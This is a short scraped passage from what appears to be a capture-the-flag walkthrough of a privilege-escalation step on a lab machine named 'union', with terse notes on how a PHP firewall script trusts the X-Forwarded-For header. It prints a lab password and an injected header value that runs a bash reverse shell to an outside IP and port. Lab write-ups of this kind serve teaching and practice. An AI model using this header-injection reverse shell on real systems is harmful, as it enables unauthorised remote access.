Priv Esc
uhc-11qual-global-pw
View how firewall allowed us access to port 22
uhc@union:~$ cat /var/www/html/firewall.php

Breakdown
If
HTTP_X_FORWARDED_FOR
is setSet
$ip
to its valueElse
Use
REMOTE_ADDR
for$ip
X-FORWARDED-FOR: ;bash -c 'bash -i >& /dev/tcp/10.10.14.18/4443 0>&1';



Last updated
Was this helpful?